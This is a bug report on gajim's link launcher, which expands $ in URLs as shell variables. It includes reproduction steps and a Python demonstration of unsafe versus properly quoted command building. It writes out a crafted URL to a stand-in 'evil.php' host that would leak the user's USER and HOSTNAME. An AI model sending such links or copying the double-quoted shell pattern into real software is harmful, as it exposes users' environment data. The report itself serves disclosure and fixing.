launch_browser_mailer mangles links containing $
Bug description
If you click a link in a chat session whose URL contains the $ symbol, any text from that symbol up to the next special character is lost when the browser navigates to the URL.
This appears to be because gajim launches the web page with Popen and, under Linux, $tokens are expanded as shell variables. It is therefore also possible to craft URLs such as http://example.com/evil.php?username=$USER&hostname=$HOSTNAME which, if clicked by the user, leak environment variables in an XSS-like way.
Steps to reproduce
- Open a gajim chat window
- Post a URL such as http://example.com/evil.php?username=$USER&hostname=$HOSTNAME
- Click the URL
- Observe that the browser loads an unexpected address.
Software versions
- OS version: Fedora Linux : 2.6.32.11-99.fc12.x86_64
- GTK version: 2.16.0
- PyGTK version: 2.18.9
Proposed Solutions
- In build_command on line 382 of src/common/helpers.py, enclose the parameter in '' instead of "", since double quotes allow shell variables to be evaluated.
- Use webbrowser to handle link opening and do not manually popen.
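The following is an added illustration of the two proposals, not code from gajim: it reproduces the reported pattern (URL dropped into a double-quoted shell string) next to a properly quoted string and an argument list that never touches a shell. It assumes a POSIX /bin/sh, uses `printf %s` as a stand-in for the browser so the URL it actually receives can be captured, and feeds constructed USER/HOSTNAME values so nothing real leaks.

```python
import os
import shlex
import subprocess

# Constructed sample: the URL from the report, with environment values we control
# so the leak is deterministic and no real environment data is exposed.
REPORTED_URL = "http://example.com/evil.php?username=$USER&hostname=$HOSTNAME"
FAKE_ENV = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"),
            "USER": "alice", "HOSTNAME": "laptop"}
# 'printf %s' stands in for the browser: it echoes the URL it was handed,
# which is exactly what the real browser would have navigated to.
BROWSER = "printf %s"


def build_command_unsafe(browser, url):
    """The pattern described in the report: the URL is interpolated into a
    double-quoted shell string, so /bin/sh expands $USER and $HOSTNAME before
    the browser is even started."""
    return '%s "%s"' % (browser, url)


def build_command_quoted(browser, url):
    """If a shell command string is unavoidable, shlex.quote single-quotes the
    URL and escapes any embedded single quote, so nothing is expanded and a
    URL containing ' does not break the command either."""
    return "%s %s" % (browser, shlex.quote(url))


def build_argv(url):
    """Preferred fix: pass an argument list; no shell is involved at all."""
    return ["printf", "%s", url]


def url_received_by_browser(cmd, use_shell):
    """Run the command and return the URL the stand-in browser actually saw."""
    result = subprocess.run(cmd, shell=use_shell, env=FAKE_ENV,
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    # Expanded: ...username=alice&hostname=laptop (the leak from the report)
    print(url_received_by_browser(build_command_unsafe(BROWSER, REPORTED_URL), True))
    # Both of these hand the browser the URL verbatim
    print(url_received_by_browser(build_command_quoted(BROWSER, REPORTED_URL), True))
    print(url_received_by_browser(build_argv(REPORTED_URL), False))
```

Note that wrapping the parameter in bare single quotes, as the first proposal suggests, still fails for a URL that itself contains a single quote; shlex.quote handles that case, and the argument-list (or webbrowser) route avoids the shell entirely.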